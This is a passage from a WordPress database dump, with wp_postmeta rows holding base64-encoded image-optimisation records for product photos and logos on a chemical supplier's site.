dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDA3LCJpZCI6MjAwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk0MDksImlkIjoyMDAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTQxMSwiaWQiOjIwMDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDEzLCJpZCI6MjAwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS01MTB4NDk4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NDk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLTUxMHg0OTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEtNTEweDQ5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk0MTUsImlkIjoyMDAyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28878, 2001, 'wpfc_optimisation_reduction', '77635'); 
INSERT INTO `wp_postmeta` VALUES (28879, 2001, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLmpwZyIsIndpZHRoIjo2ODAsImhlaWdodCI6NDk4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLmpwZyIsInJlZHVjdGlvbiI6Nzc2MzAsInRpbWUiOjE0ODM1NDk0MjMsImlkIjoiMjAwMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDI1LCJpZCI6MjAwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk0MjcsImlkIjoyMDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTQyOSwiaWQiOjIwMDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDMxLCJpZCI6MjAwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItNTEweDQ5OC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjQ5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItNTEweDQ5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItNTEweDQ5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk0MzQsImlkIjoyMDAxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28880, 1997, 'wpfc_optimisation_reduction', '16857'); 
INSERT INTO `wp_postmeta` VALUES (28881, 1997, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTQ5NDM4LCJpZCI6IjE5OTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjY0LCJ0aW1lIjoxNDgzNTQ5NDQyLCJpZCI6MTk5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjIzODIsInRpbWUiOjE0ODM1NDk0NDUsImlkIjoxOTk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjEwMCwidGltZSI6MTQ4MzU0OTQ0OSwiaWQiOjE5OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjkwMDMsInRpbWUiOjE0ODM1NDk0NTMsImlkIjoxOTk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDk5LCJ0aW1lIjoxNDgzNTQ5NDU2LCJpZCI6MTk5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1MCwidGltZSI6MTQ4MzU0OTQ1OSwiaWQiOjE5OTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0ODgsInRpbWUiOjE0ODM1NDk0NjMsImlkIjoxOTk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTIyNC1UUklHR0VSLVNQUkFZLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjI0LVRSSUdHRVItU1BSQVktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yMjQtVFJJR0dFUi1TUFJBWS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTI3MSwidGltZSI6MTQ4MzU0OTQ2NiwiaWQiOjE5OTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28882, 1995, 'wpfc_optimisation_reduction', '38365'); 
INSERT INTO `wp_postmeta` VALUES (28883, 1995, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tNC5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby00LmpwZyIsInJlZHVjdGlvbiI6MzgzNjEsInRpbWUiOjE0ODM1NDk0NzMsImlkIjoiMTk5NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTQtMzQweDE5OC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tNC0zNDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby00LTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDc1LCJpZCI6MTk5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tNC0yNTB4MTk4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby00LTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLTQtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk0NzcsImlkIjoxOTk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby00LTIwMHgxOTguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTQtMjAweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXpvLWxvZ28tNC0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTQ3OSwiaWQiOjE5OTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLTQtMjI1eDE5OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tNC0yMjV4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby00LTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5NDgxLCJpZCI6MTk5NX1d'); 
INSERT INTO `wp_postmeta` VALUES (28884, 1990, 'wpfc_optimisation_reduction', '26419'); 
INSERT INTO `wp_postmeta` VALUES (28885, 1990, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTQ5NDg2LCJpZCI6IjE5OTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MTAxNi